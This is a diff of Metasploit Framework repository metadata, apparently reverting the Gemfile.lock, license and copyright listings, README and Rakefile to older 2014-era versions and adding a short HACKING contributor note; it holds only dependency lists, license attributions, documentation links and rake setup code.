-    rex-socket (0.1.43)
-      rex-core
-    rex-sslscan (0.1.8)
-      rex-core
-      rex-socket
-      rex-text
-    rex-struct2 (0.1.3)
-    rex-text (0.2.45)
-    rex-zip (0.1.4)
-      rex-text
-    rexml (3.2.5)
-    rkelly-remix (0.0.7)
-    rspec (3.11.0)
-      rspec-core (~> 3.11.0)
-      rspec-expectations (~> 3.11.0)
-      rspec-mocks (~> 3.11.0)
-    rspec-core (3.11.0)
-      rspec-support (~> 3.11.0)
-    rspec-expectations (3.11.1)
-      diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.11.0)
-    rspec-mocks (3.11.1)
-      diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.11.0)
-    rspec-rails (6.0.1)
-      actionpack (>= 6.1)
-      activesupport (>= 6.1)
-      railties (>= 6.1)
-      rspec-core (~> 3.11)
-      rspec-expectations (~> 3.11)
-      rspec-mocks (~> 3.11)
-      rspec-support (~> 3.11)
-    rspec-rerun (1.1.0)
-      rspec (~> 3.0)
-    rspec-support (3.11.1)
-    rubocop (1.37.0)
-      json (~> 2.3)
-      parallel (~> 1.10)
-      parser (>= 3.1.2.1)
-      rainbow (>= 2.2.2, < 4.0)
-      regexp_parser (>= 1.8, < 3.0)
-      rexml (>= 3.2.5, < 4.0)
-      rubocop-ast (>= 1.22.0, < 2.0)
-      ruby-progressbar (~> 1.7)
-      unicode-display_width (>= 1.4.0, < 3.0)
-    rubocop-ast (1.22.0)
-      parser (>= 3.1.1.0)
-    ruby-macho (3.0.0)
-    ruby-prof (1.4.2)
-    ruby-progressbar (1.11.0)
-    ruby-rc4 (0.1.5)
-    ruby2_keywords (0.0.5)
-    ruby_smb (3.2.0)
-      bindata
-      openssl-ccm
-      openssl-cmac
-      rubyntlm
-      windows_error (>= 0.1.4)
-    rubyntlm (0.6.3)
-    rubyzip (2.3.2)
-    sawyer (0.9.2)
-      addressable (>= 2.3.5)
-      faraday (>= 0.17.3, < 3)
-    simplecov (0.18.2)
-      docile (~> 1.1)
-      simplecov-html (~> 0.11)
-    simplecov-html (0.12.3)
-    simpleidn (0.2.1)
-      unf (~> 0.1.4)
-    sinatra (3.0.2)
-      mustermann (~> 3.0)
-      rack (~> 2.2, >= 2.2.4)
-      rack-protection (= 3.0.2)
-      tilt (~> 2.0)
-    sqlite3 (1.5.3)
-      mini_portile2 (~> 2.8.0)
-    sshkey (2.0.0)
-    swagger-blocks (3.0.0)
-    thin (1.8.1)
-      daemons (~> 1.0, >= 1.0.9)
-      eventmachine (~> 1.0, >= 1.0.4)
-      rack (>= 1, < 3)
-    thor (1.2.1)
-    tilt (2.0.11)
-    timecop (0.9.5)
-    timeout (0.3.0)
-    ttfunk (1.7.0)
-    tzinfo (2.0.5)
-      concurrent-ruby (~> 1.0)
-    tzinfo-data (1.2022.5)
-      tzinfo (>= 1.0.0)
-    unf (0.1.4)
-      unf_ext
-    unf_ext (0.0.8.2)
-    unicode-display_width (2.3.0)
-    unix-crypt (1.3.0)
-    warden (1.2.9)
-      rack (>= 2.0.9)
-    webrick (1.7.0)
-    websocket-driver (0.7.5)
-      websocket-extensions (>= 0.1.0)
-    websocket-extensions (0.1.5)
-    win32api (0.1.0)
-    windows_error (0.1.4)
-    winrm (2.3.6)
-      builder (>= 2.1.2)
-      erubi (~> 1.8)
-      gssapi (~> 1.2)
-      gyoku (~> 1.0)
-      httpclient (~> 2.2, >= 2.2.0.2)
-      logging (>= 1.6.1, < 3.0)
-      nori (~> 2.0)
-      rubyntlm (~> 0.6.0, >= 0.6.3)
-    xdr (3.0.3)
-      activemodel (>= 4.2, < 8.0)
-      activesupport (>= 4.2, < 8.0)
-    xmlrpc (0.3.2)
-      webrick
-    yard (0.9.28)
-      webrick (~> 1.7.0)
-    zeitwerk (2.6.1)
+    mini_portile (0.5.1)
+    msgpack (0.5.5)
+    multi_json (1.0.4)
+    network_interface (0.0.1)
+    nokogiri (1.6.0)
+      mini_portile (~> 0.5.0)
+    packetfu (1.1.9)
+    pcaprub (0.11.3)
+    pg (0.16.0)
+    rake (10.1.0)
+    redcarpet (3.0.0)
+    robots (0.10.1)
+    rspec (2.14.1)
+      rspec-core (~> 2.14.0)
+      rspec-expectations (~> 2.14.0)
+      rspec-mocks (~> 2.14.0)
+    rspec-core (2.14.5)
+    rspec-expectations (2.14.2)
+      diff-lcs (>= 1.1.3, < 2.0)
+    rspec-mocks (2.14.3)
+    shoulda-matchers (2.3.0)
+      activesupport (>= 3.0.0)
+    simplecov (0.5.4)
+      multi_json (~> 1.0.3)
+      simplecov-html (~> 0.5.3)
+    simplecov-html (0.5.3)
+    timecop (0.6.3)
+    tzinfo (0.3.37)
+    yard (0.8.7)

 PLATFORMS
  ruby

 DEPENDENCIES
-  debug (>= 1.0.0)
-  factory_bot_rails
-  fivemat
-  memory_profiler
-  metasploit-framework!
-  octokit
-  pry-byebug (~> 3.9.0)
-  rake
+  activerecord
+  activesupport (>= 3.0.0)
+  bcrypt-ruby
+  database_cleaner
+  factory_girl (>= 4.1.0)
+  fivemat (= 1.2.1)
+  json
+  metasploit_data_models (~> 0.17.0)
+  msgpack
+  network_interface (~> 0.0.1)
+  nokogiri
+  packetfu (= 1.1.9)
+  pcaprub
+  pg (>= 0.11)
+  rake (>= 10.0.0)
  redcarpet
-  rspec-rails
-  rspec-rerun
-  rubocop
-  ruby-prof (= 1.4.2)
-  simplecov (= 0.18.2)
+  robots
+  rspec (>= 2.12)
+  shoulda-matchers
+  simplecov (= 0.5.4)
  timecop
  yard
-
-BUNDLED WITH
-   2.1.4
@@ -0,0 +1,38 @@
+HACKING
+=======
+
+(Last updated: 2014-03-04)
+
+This document almost entirely deprecated by:
+
+CONTRIBUTING.md
+
+in the same directory as this file, and to a lesser extent:
+
+The Metasploit Development Environment
+https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Development-Environment
+
+Common Coding Mistakes
+https://github.com/rapid7/metasploit-framework/wiki/Common-Metasploit-Module-Coding-Mistakes
+
+The Ruby Style Guide
+https://github.com/bbatsov/ruby-style-guide
+
+Ruby 1.9: What to Expect
+http://slideshow.rubyforge.org/ruby19.html
+
+You can use the the "./tools/msftidy.rb" script against your new and
+changed modules to do some rudimentary checking for various style and
+syntax violations.
+
+Licensing for Your New Content
+==============================
+
+By submitting code contributions to the Metasploit Project it is
+assumed that you are offering your code under the Metasploit License
+or similar 3-clause BSD-compatible license.  MIT and Ruby Licenses
+are also fine.  We specifically cannot include GPL code. LGPL code
+is accepted on a case by case basis for libraries only and is never
+accepted for modules.
+
+
@@ -1,8 +1,8 @@
-Format: https://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
-Source: https://www.metasploit.com/
+Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
+Source: http://www.metasploit.com/

 Files: *
-Copyright: 2006-2020, Rapid7, Inc.
+Copyright: 2006-2014, Rapid7, Inc.
 License: BSD-3-clause

 # The Metasploit Framework is provided under the 3-clause BSD license provided
@@ -15,22 +15,26 @@ License: BSD-3-clause
 # Last updated: 2013-Nov-04
 #

-Files: data/headers/windows/c_payload_util/beacon.h
-Copyright: 2022, Copyright Help/Systems LLC and its group of companies.
-License: Apache 2.0
-
-Files: data/exploits/mysql/lib_mysqludf_sys_*.so
-Copyright: 2007  Roland Bouman
-           2008-2010  Roland Bouman and Bernardo Damele A. G.
-License: LGPL-2.1
-
 Files: data/templates/to_mem_pshreflection.ps1.template
 Copyright: 2012, Matthew Graeber
 License: BSD-3-clause

-Files: external/source/exploits/IE11SandboxEscapes/*
-Copyright: James Forshaw, 2014
-License: GPLv3
+Files: data/john/*
+Copyright: 1996-2011 Solar Designer.
+License: GPL-2
+
+Files: external/pcaprub/*
+Copyright: 2007-2008, Alastair Houghton
+License: LGPL-2.1
+
+Files: external/ruby-kissfft/*
+Copyright: 2003-2010 Mark Borgerding
+           2009-2012 H D Moore <hdm[at]rapid7.com>
+License: BSD-3-clause
+
+Files: external/ruby-lorcon/*
+Copyright: 2005, dragorn and Joshua Wright
+License: LGPL-2.1

 Files: external/source/byakugan/*
 Copyright: Lurene Grenier, 2009
@@ -75,22 +79,42 @@ Files: lib/anemone.rb lib/anemone/*
 Copyright: 2009 Vertive, Inc.
 License: MIT

-Files: lib/expect.rb
-Copyright: 2017 Yukihiro Matsumoto
+Files: lib/bit-struct.rb lib/bit-struct/*
+Copyright: 2005-2009, Joel VanderWerf
 License: Ruby

-Files: lib/msf/core/modules/external/python/async_timeout/*
-Copyright: 2016-2017 Andrew Svetlov
-License: Apache 2.0
+Files: lib/fastlib.rb
+Copyright: 2011, Rapid7, Inc.
+License: Ruby
+
+Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
+Copyright: 2006-2010 Yoann GUILLOT
+License: LGPL-2.1
+
+Files: lib/nessus/*
+Copyright: Vlatoko Kosturjak
+License: BSD-3-clause

 Files: lib/net/dns.rb lib/net/dns/*
 Copyright: 2006 Marco Ceresa
 License: Ruby

+Files: lib/net/ssh.rb lib/net/ssh/*
+Copyright: 2008 Jamis Buck <jamis@37signals.com>
+License: MIT
+
+Files: lib/packetfu.rb lib/packetfu/*
+Copyright: 2008-2012 Tod Beardsley
+License: BSD-3-clause
+
 Files: lib/postgres_msf.rb lib/postgres/postgres-pr/message.rb lib/postgres/postgres-pr/connection.rb
 Copyright: 2005 Michael Neumann
 License: BSD-3-clause or Ruby

+Files: lib/openvas/*
+Copyright: No copyright statement provided
+License: MIT
+
 Files: lib/rabal/*
 Copyright: Jeremy Hinegadner <jeremy at hinegardner dot org>
 License: Ruby
@@ -99,10 +123,22 @@ Files: lib/rbmysql.rb lib/rbmysql/*
 Copyright: 2009 tommy
 License: Ruby

+Files: lib/rbreadline.rb
+Copyright: 2009 Park Heesob
+License: BSD-3-clause
+
+Files: lib/rkelly/*
+Copyright: 2007, 2008, 2009 Aaron Patternson, John Barnette
+License: MIT
+
 Files: lib/snmp.rb lib/snmp/*
 Copyright: 2004, David R. Halliday
 License: Ruby

+Files: lib/sshkey.rb lib/sshkey/*
+Copyright: 2011 James Miller
+License: MIT
+
 Files: lib/windows_console_color_support.rb
 Copyright: 2011 Michael 'mihi' Schierl
 License: BSD-3-clause
@@ -119,26 +155,132 @@ Files: data/webcam/api.js
 Copyright: Copyright 2013 Muaz Khan<@muazkh>.
 License: MIT

-Files: lib/msf/core/web_services/public/*, lib/msf/core/web_services/views/api_docs.erb
-Copyright: Copyright 2018 SmartBear Software
-License: Apache 2.0

-Files: data/jtr/*
-Copyright: Copyright 1996-2013 by Solar Designer
-License: GNU GPL 2.0
+#
+# Gems
+#

-Files: external/source/exploits/drunkpotato/Common_Src_Files/spnegotokenhandler/*
-Copyright: 2011 Jon Bringhurst
-License: GNU GPL 2.0
-
-Files: external/source/evasion/windows/process_herpaderping/ProcessHerpaderping/*
-Copyright: 2020 Johnny Shaw
+Files: activemodel
+Copyright: 2004-2011 David Heinemeier Hansson
 License: MIT

-Files: exteneral/source/exploits/CVE-2022-26904/*
-Copywrite: 2022 Abdelhamid Naceri
+Files: activerecord
+Copyright: 2004-2011 David Heinemeier Hansson
 License: MIT

+Files: activesupport
+Copyright: 2005-2011 David Heinemeier Hansson
+License: MIT
+
+Files: arel
+Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
+License: MIT
+
+Files: bcrypt-ruby
+Copyright: 2007-2011 Coda Hale
+License: MIT
+
+Files: builder
+Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com)
+License: MIT
+
+Files: database_cleaner
+Copyright: 2009 Ben Mabey
+License: MIT
+
+Files: diff-lcs
+Copyright: 2004-2011 Austin Ziegler
+License: MIT
+
+Files: factory_girl
+Copyright: 2008-2013 Joe Ferris and thoughtbot, inc.
+License: MIT
+
+Files: fivemat
+Copyright: 2012 Tim Pope
+License: MIT
+
+Files: i18n
+Copyright: 2008 The Ruby I18n team
+License: MIT
+
+Files: json
+Copyright: Daniel Luz <dev at mernen dot com>
+License: Ruby
+
+Files: metasploit_data_models
+Copyright: 2012 Rapid7, Inc.
+License: MIT
+
+Files: mini_portile
+Copyright: 2011 Luis Lavena
+License: MIT
+
+Files: msgpack
+Copyright: Austin Ziegler
+License: Ruby
+
+Files: multi_json
+Copyright: 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc.
+License: MIT
+
+Files: network_interface
+Copyright: 2012, Rapid7, Inc.
+License: MIT
+
+Files: nokogiri
+Copyright: 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada
+License: MIT
+
+Files: packetfu
+Copyright: 2008-2012 Tod Beardsley
+License: BSD-3-clause
+
+Files: pcaprub
+Copyright: 2007-2008, Alastair Houghton
+License: LGPL-2.1
+
+Files: pg
+Copyright: 1997-2012 by the authors
+License: Ruby
+
+Files: rake
+Copyright: 2003, 2004 Jim Weirich
+License: MIT
+
+Files: redcarpet
+Copyright: 2009 Natacha Porté
+License: MIT
+
+Files: robots
+Copyright: 2008 Kyle Maxwell, contributors
+License: MIT
+
+Files: rspec
+Copyright: 2009 Chad Humphries, David Chelimsky
+License: MIT
+
+Files: shoulda-matchers
+Copyright: 2006-2013, Tammer Saleh, thoughtbot, inc.
+License: MIT
+
+Files: simplecov
+Copyright: 2010-2012 Christoph Olszowka
+License: MIT
+
+Files: timecop
+Copyright: 2012 Travis Jeffery, John Trupiano
+License: MIT
+
+Files: tzinfo
+Copyright: 2005-2006 Philip Ross
+License: MIT
+
+Files: yard
+Copyright: 2007-2013 Loren Segal
+License: MIT
+
+
 License: BSD-2-clause
 Redistribution and use in source and binary forms, with or without modification,
 are permitted provided that the following conditions are met:
@@ -627,54 +769,6 @@ License: Artistic
 DAMAGES ARISING IN ANY WAY OUT OF THE USE OF THE PACKAGE, EVEN IF
 ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

-License: Apache
- Version 1.1, 2000
- Modifications by CORE Security Technologies
- .
- Copyright (c) 2000 The Apache Software Foundation.  All rights
- reserved.
- .
- Redistribution and use in source and binary forms, with or without
- modification, are permitted provided that the following conditions
- are met:
- .
- 1. Redistributions of source code must retain the above copyright
-    notice, this list of conditions and the following disclaimer.
- .
- 2. Redistributions in binary form must reproduce the above copyright
-    notice, this list of conditions and the following disclaimer in
-    the documentation and/or other materials provided with the
-    distribution.
- .
- 3. The end-user documentation included with the redistribution,
-    if any, must include the following acknowledgment:
-       "This product includes software developed by
-        CORE Security Technologies (http://www.coresecurity.com/)."
-    Alternately, this acknowledgment may appear in the software itself,
-    if and wherever such third-party acknowledgments normally appear.
- .
- 4. The names "Impacket" and "CORE Security Technologies" must
-    not be used to endorse or promote products derived from this
-    software without prior written permission. For written
-    permission, please contact oss@coresecurity.com.
- .
- 5. Products derived from this software may not be called "Impacket",
-    nor may "Impacket" appear in their name, without prior written
-    permission of CORE Security Technologies.
- .
- THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESSED OR IMPLIED
- WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
- OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
- DISCLAIMED.  IN NO EVENT SHALL THE APACHE SOFTWARE FOUNDATION OR
- ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
- LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
- USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
- ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
- OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
- OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- SUCH DAMAGE.
-
 License: Apache
 Version 2.0, January 2004
 http://www.apache.org/licenses/
@@ -1,192 +0,0 @@
-This file is auto-generated by tools/dev/update_gem_licenses.sh
-Ascii85, 1.1.0, MIT
-actionpack, 6.1.7, MIT
-actionview, 6.1.7, MIT
-activemodel, 6.1.7, MIT
-activerecord, 6.1.7, MIT
-activesupport, 6.1.7, MIT
-addressable, 2.8.1, "Apache 2.0"
-afm, 0.2.2, MIT
-arel-helpers, 2.14.0, MIT
-ast, 2.4.2, MIT
-aws-eventstream, 1.2.0, "Apache 2.0"
-aws-partitions, 1.628.0, "Apache 2.0"
-aws-sdk-core, 3.145.0, "Apache 2.0"
-aws-sdk-ec2, 1.331.0, "Apache 2.0"
-aws-sdk-iam, 1.70.0, "Apache 2.0"
-aws-sdk-kms, 1.58.0, "Apache 2.0"
-aws-sdk-s3, 1.114.0, "Apache 2.0"
-aws-sigv4, 1.5.1, "Apache 2.0"
-bcrypt, 3.1.18, MIT
-bcrypt_pbkdf, 1.1.0, MIT
-bindata, 2.4.10, ruby
-bson, 4.15.0, "Apache 2.0"
-builder, 3.2.4, MIT
-bundler, 2.1.4, MIT
-byebug, 11.1.3, "Simplified BSD"
-coderay, 1.1.3, MIT
-concurrent-ruby, 1.0.5, MIT
-cookiejar, 0.3.3, unknown
-crass, 1.0.6, MIT
-daemons, 1.4.1, MIT
-debug, 1.6.2, "ruby, Simplified BSD"
-diff-lcs, 1.5.0, "MIT, Artistic-2.0, GPL-2.0+"
-digest, 3.1.0, "ruby, Simplified BSD"
-dnsruby, 1.61.9, "Apache 2.0"
-docile, 1.4.0, MIT
-domain_name, 0.5.20190701, "Simplified BSD, New BSD, Mozilla Public License 2.0"
-ed25519, 1.3.0, MIT
-em-http-request, 1.1.7, MIT
-em-socksify, 0.3.2, MIT
-erubi, 1.11.0, MIT
-eventmachine, 1.2.7, "ruby, GPL-2.0"
-factory_bot, 6.2.1, MIT
-factory_bot_rails, 6.2.0, MIT
-faker, 2.23.0, MIT
-faraday, 2.5.2, MIT
-faraday-net_http, 3.0.0, MIT
-faraday-retry, 2.0.0, MIT
-faye-websocket, 0.11.1, "Apache 2.0"
-ffi, 1.15.5, "New BSD"
-filesize, 0.2.0, MIT
-fivemat, 1.3.7, MIT
-gssapi, 1.3.1, MIT
-gyoku, 1.4.0, MIT
-hashery, 2.1.2, "Simplified BSD"
-hrr_rb_ssh, 0.4.2, "Apache 2.0"
-hrr_rb_ssh-ed25519, 0.4.2, "Apache 2.0"
-http-cookie, 1.0.5, MIT
-http_parser.rb, 0.8.0, MIT
-httpclient, 2.8.3, ruby
-i18n, 1.12.0, MIT
-io-console, 0.5.11, "ruby, Simplified BSD"
-irb, 1.4.1, "ruby, Simplified BSD"
-jmespath, 1.6.1, "Apache 2.0"
-jsobfu, 0.4.2, "New BSD"
-json, 2.6.2, ruby
-little-plugger, 1.1.4, MIT
-logging, 2.3.1, MIT
-loofah, 2.18.0, MIT
-memory_profiler, 1.0.0, MIT
-metasm, 1.0.5, LGPL-2.1
-metasploit-concern, 4.0.5, "New BSD"
-metasploit-credential, 5.0.9, "New BSD"
-metasploit-framework, 6.2.24, "New BSD"
-metasploit-model, 4.0.6, "New BSD"
-metasploit-payloads, 2.0.97, "3-clause (or ""modified"") BSD"
-metasploit_data_models, 5.0.5, "New BSD"
-metasploit_payloads-mettle, 1.0.20, "3-clause (or ""modified"") BSD"
-method_source, 1.0.0, MIT
-mini_portile2, 2.8.0, MIT
-minitest, 5.16.3, MIT
-mqtt, 0.5.0, MIT
-msgpack, 1.5.6, "Apache 2.0"
-multi_json, 1.15.0, MIT
-mustermann, 2.0.2, MIT
-nessus_rest, 0.1.6, MIT
-net-ldap, 0.17.1, MIT
-net-protocol, 0.1.3, "ruby, Simplified BSD"
-net-smtp, 0.3.1, "ruby, Simplified BSD"
-net-ssh, 7.0.1, MIT
-network_interface, 0.0.2, MIT
-nexpose, 7.3.0, "New BSD"
-nio4r, 2.5.8, MIT
-nokogiri, 1.13.8, MIT
-nori, 2.6.0, MIT
-octokit, 4.25.1, MIT
-openssl-ccm, 1.2.3, MIT
-openssl-cmac, 2.0.2, MIT
-openvas-omp, 0.0.4, MIT
-packetfu, 1.1.13, BSD
-parallel, 1.22.1, MIT
-parser, 3.1.2.1, MIT
-patch_finder, 1.0.2, "New BSD"
-pcaprub, 0.13.1, LGPL-2.1
-pdf-reader, 2.10.0, MIT
-pg, 1.4.3, "Simplified BSD"
-pry, 0.13.1, MIT
-pry-byebug, 3.9.0, MIT
-public_suffix, 5.0.0, MIT
-puma, 5.6.5, "New BSD"
-racc, 1.6.0, "ruby, Simplified BSD"
-rack, 2.2.4, MIT
-rack-protection, 2.2.2, MIT
-rack-test, 2.0.2, MIT
-rails-dom-testing, 2.0.3, MIT
-rails-html-sanitizer, 1.4.3, MIT
-railties, 6.1.7, MIT
-rainbow, 3.1.1, MIT
-rake, 13.0.6, MIT
-rb-readline, 0.5.5, BSD
-recog, 2.3.23, unknown
-redcarpet, 3.5.1, MIT
-regexp_parser, 2.5.0, MIT
-reline, 0.3.1, ruby
-rex-arch, 0.1.14, "New BSD"
-rex-bin_tools, 0.1.8, "New BSD"
-rex-core, 0.1.28, "New BSD"
-rex-encoder, 0.1.6, "New BSD"
-rex-exploitation, 0.1.36, "New BSD"
-rex-java, 0.1.6, "New BSD"
-rex-mime, 0.1.7, "New BSD"
-rex-nop, 0.1.2, "New BSD"
-rex-ole, 0.1.7, "New BSD"
-rex-powershell, 0.1.97, "New BSD"
-rex-random_identifier, 0.1.9, "New BSD"
-rex-registry, 0.1.4, "New BSD"
-rex-rop_builder, 0.1.4, "New BSD"
-rex-socket, 0.1.43, "New BSD"
-rex-sslscan, 0.1.8, "New BSD"
-rex-struct2, 0.1.3, "New BSD"
-rex-text, 0.2.45, "New BSD"
-rex-zip, 0.1.4, "New BSD"
-rexml, 3.2.5, "Simplified BSD"
-rkelly-remix, 0.0.7, MIT
-rspec, 3.11.0, MIT
-rspec-core, 3.11.0, MIT
-rspec-expectations, 3.11.1, MIT
-rspec-mocks, 3.11.1, MIT
-rspec-rails, 5.1.2, MIT
-rspec-rerun, 1.1.0, MIT
-rspec-support, 3.11.1, MIT
-rubocop, 1.36.0, MIT
-rubocop-ast, 1.21.0, MIT
-ruby-macho, 3.0.0, MIT
-ruby-prof, 1.4.2, "Simplified BSD"
-ruby-progressbar, 1.11.0, MIT
-ruby-rc4, 0.1.5, MIT
-ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
-ruby_smb, 3.2.0, "New BSD"
-rubyntlm, 0.6.3, MIT
-rubyzip, 2.3.2, "Simplified BSD"
-sawyer, 0.9.2, MIT
-simplecov, 0.18.2, MIT
-simplecov-html, 0.12.3, MIT
-simpleidn, 0.2.1, MIT
-sinatra, 2.2.2, MIT
-sqlite3, 1.5.0, "New BSD"
-sshkey, 2.0.0, MIT
-swagger-blocks, 3.0.0, MIT
-thin, 1.8.1, "GPL-2.0+, ruby"
-thor, 1.2.1, MIT
-tilt, 2.0.11, MIT
-timecop, 0.9.5, MIT
-timeout, 0.3.0, "ruby, Simplified BSD"
-ttfunk, 1.7.0, "Nonstandard, GPL-2.0, GPL-3.0"
-tzinfo, 2.0.5, MIT
-tzinfo-data, 1.2022.3, MIT
-unf, 0.1.4, "2-clause BSDL"
-unf_ext, 0.0.8.2, MIT
-unicode-display_width, 2.2.0, MIT
-unix-crypt, 1.3.0, BSD
-warden, 1.2.9, MIT
-webrick, 1.7.0, "ruby, Simplified BSD"
-websocket-driver, 0.7.5, "Apache 2.0"
-websocket-extensions, 0.1.5, "Apache 2.0"
-win32api, 0.1.0, unknown
-windows_error, 0.1.4, BSD
-winrm, 2.3.6, "Apache 2.0"
-xdr, 3.0.3, "Apache 2.0"
-xmlrpc, 0.3.2, "ruby, Simplified BSD"
-yard, 0.9.28, MIT
-zeitwerk, 2.6.0, MIT
@@ -1,54 +1,55 @@
-Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.svg?branch=master)](https://travis-ci.org/rapid7/metasploit-framework) [![Maintainability](https://api.codeclimate.com/v1/badges/943e398e619c09568f3f/maintainability)](https://codeclimate.com/github/rapid7/metasploit-framework/maintainability) [![Test Coverage](https://api.codeclimate.com/v1/badges/943e398e619c09568f3f/test_coverage)](https://codeclimate.com/github/rapid7/metasploit-framework/test_coverage) [![Docker Pulls](https://img.shields.io/docker/pulls/metasploitframework/metasploit-framework.svg)](https://hub.docker.com/r/metasploitframework/metasploit-framework/)
+
+Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.png)](https://travis-ci.org/rapid7/metasploit-framework) [![Code Climate](https://codeclimate.com/badge.png)](https://codeclimate.com/github/rapid7/metasploit-framework)
 ==
 The Metasploit Framework is released under a BSD-style license. See
-[COPYING](COPYING) for more details.
+COPYING for more details.

-The latest version of this software is available from: https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html
+The latest version of this software is available from http://metasploit.com/

-You can find documentation on Metasploit and how to use it at:
- https://docs.metasploit.com/
+Bug tracking and development information can be found at:
+ https://dev.metasploit.com/redmine/projects/framework/

-Information about setting up a development environment can be found at:
- https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html
+The public GitHub source repository can be found at:
+ https://github.com/rapid7/metasploit-framework

-Our bug and feature request tracker can be found at:
- https://github.com/rapid7/metasploit-framework/issues
+Questions and suggestions can be sent to:
+ msfdev(at)metasploit.com

-New bugs and feature requests should be directed to:
-  https://r-7.co/MSF-BUGv1
+The framework mailing list is the place to discuss features and ask for help.
+To subscribe, visit the following web page:
+ https://mail.metasploit.com/mailman/listinfo/framework

-API documentation for writing modules can be found at:
-  https://docs.metasploit.com/api/
-
-Questions and suggestions can be sent to: Freenode IRC channel or e-mail the metasploit-hackers mailing list
+The mailing list archives are available from:
+ https://mail.metasploit.com/pipermail/framework/

 Installing
 --
-
-Generally, you should use [the free installer](https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html),
-which contains all of the dependencies and will get you up and running with a
-few clicks. See the [Dev Environment Setup](https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html) if
-you'd like to deal with dependencies on your own.
+Generally, you should use the installer which contains all dependencies
+and will get you up and running with a few clicks. See the [Dev
+Environment Setup][wiki-devenv] if you'd like to deal with dependencies
+on your own.

 Using Metasploit
 --
 Metasploit can do all sorts of things. The first thing you'll want to do
 is start `msfconsole`, but after that, you'll probably be best served by
-reading [Metasploit Unleashed][unleashed], the [great community
-resources](https://metasploit.github.io), or take a look at the
-[Using Metasploit](https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html)
-page on the documentation website.
+reading some of the great tutorials online:
+
+  * [Metasploit Unleashed][unleashed]
+  * [The official Metasploit wiki on Github][wiki-start]

 Contributing
 --
-See the [Dev Environment Setup][devenv] guide on GitHub, which will
-walk you through the whole process from installing all the
+See the [Dev Environment Setup][wiki-devenv] guide on GitHub which will
+walk you through the whole process starting from installing all the
 dependencies, to cloning the repository, and finally to submitting a
-pull request. For slightly more information, see
+pull request. For slightly more info, see
 [Contributing](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md).


-[devenv]: https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html "Metasploit Development Environment Setup"
-[unleashed]: https://www.offensive-security.com/metasploit-unleashed/ "Metasploit Unleashed"
+[wiki-devenv]: https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment "Metasploit Development Environment Setup"
+[wiki-start]: https://github.com/rapid7/metasploit-framework/wiki/ "Metasploit Wiki"
+[wiki-usage]: https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit "Using Metasploit"
+[unleashed]: http://www.offensive-security.com/metasploit-unleashed/ "Metasploit Unleashed"


@@ -1,30 +1,81 @@
-#!/usr/bin/env rake
-require File.expand_path('../config/application', __FILE__)
-require 'msfenv'
-require 'metasploit/framework/require'
-require 'metasploit/framework/spec/untested_payloads'
+require 'bundler/setup'
+
+pathname = Pathname.new(__FILE__)
+root = pathname.parent
+
+# add metasploit-framework/lib to load paths so rake files can just require
+# files normally without having to use __FILE__ and recalculating root and the
+# path to lib
+lib_pathname = root.join('lib')
+$LOAD_PATH.unshift(lib_pathname.to_s)

-# @note must be before `Metasploit::Framework::Application.load_tasks`
 #
-# define db rake tasks from activerecord if activerecord is in the bundle.  activerecord could be not in the bundle if
-# the user installs with `bundle install --without db`
-Metasploit::Framework::Require.optionally_active_record_railtie
+# load rake files like a rails engine
+#

-begin
-  require 'rspec/core'
-  require 'rspec-rerun/tasks'
-rescue LoadError
-  puts "rspec not in bundle, so can't set up spec tasks.  " \
-       "To run specs ensure to install the development and test groups."
-  puts "Bundle currently installed '--without #{Bundler.settings.without.join(' ')}'."
-  puts "To clear the without option do `bundle install --without ''` (the --without flag with an empty string) or " \
-       "`rm -rf .bundle` to remove the .bundle/config manually and then `bundle install`"
-else
-  require 'rspec/core/rake_task'
-  RSpec::Core::RakeTask.new(spec: 'db:test:prepare')
+rakefile_glob = root.join('lib', 'tasks', '**', '*.rake').to_path
+
+Dir.glob(rakefile_glob) do |rakefile|
+  # Skip database tasks, will load them later if MDM is present
+  next if rakefile =~ /database\.rake$/
+  load rakefile
 end

-Metasploit::Framework::Application.load_tasks
-Metasploit::Framework::Spec::Constants.define_task
-Metasploit::Framework::Spec::Threads::Suite.define_task
-Metasploit::Framework::Spec::UntestedPayloads.define_task
+print_without = false
+
+begin
+	require 'rspec/core/rake_task'
+rescue LoadError
+	puts "rspec not in bundle, so can't set up spec tasks.  " \
+	     "To run specs ensure to install the development and test groups."
+
+	print_without = true
+else
